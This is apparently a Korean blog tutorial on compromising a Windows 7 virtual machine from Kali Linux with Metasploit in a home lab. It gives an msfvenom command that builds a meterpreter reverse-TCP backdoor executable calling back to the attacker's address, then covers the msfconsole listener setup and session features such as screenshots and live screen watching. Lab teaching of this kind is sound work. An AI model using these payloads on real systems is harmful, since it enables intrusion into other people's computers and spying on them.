보안/KaliLinux

칼리 리눅스 메타스플로잇을 활용하여 윈도우 7 해킹

lowcodingpython 2022. 2. 20. 02:13
반응형
vmware 16.2 ver 
kali 2022.1 [IP] NAT
windows 7 [IP] NAT
같은 대역 아이피 사용 

**해당 실습을 통해 실서버 다른 사람에게 공격할시 모든 책임은 당사자에게 있습니다.**
테스트는 보인 PC에서 부탁드립니다.

실습 전 자세한 설명은 옵션 -h 등으로 찾아보시면 자세한 설명들이 나와 있습니다.

 

공격전 자신의 칼리 리눅스 아이피를 먼저 확인을 해주시면 됩니다. 

칼리-리눅스-아이피-확인

백도어를 생성 

-p 사용할 페이로드 생성 

-f 포맷 형식 

-o 페이로드를 파일에 저장

Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

공유 폴더 등으로 생성된 백도어 exe파일을 windows 7에 이동해주세요.

백도어-생성

msfconsole 실행

msfconsole

exploit 하기 전에 설정 

payload는 위에서 백도어 생성 시 주신 값으로 넣어주시면 됩니다.

set lhost로 공격자 IP 적용

exploit!!

exploit

윈도우 7에서 exe파일을 실행하시면 meterpreter로 세션 창이 변경되시는 걸 보실 수 있습니다.

해당 상태에서?를 입력 시 여러 가지 옵션들을 보실 수 있습니다.

시스템 정보, ipconfig명령어, 스크린샷 등이 있습니다.

시스템-정보-확인윈도우7-아이피
스크린샷

가장 마음에 드는 공격 중 스크린 공유가 있습니다.

해당 공격 옵션은 윈도우7에서 이루어진 화면을 실시간으로 공격자가 관찰이 가능합니다.

 

반응형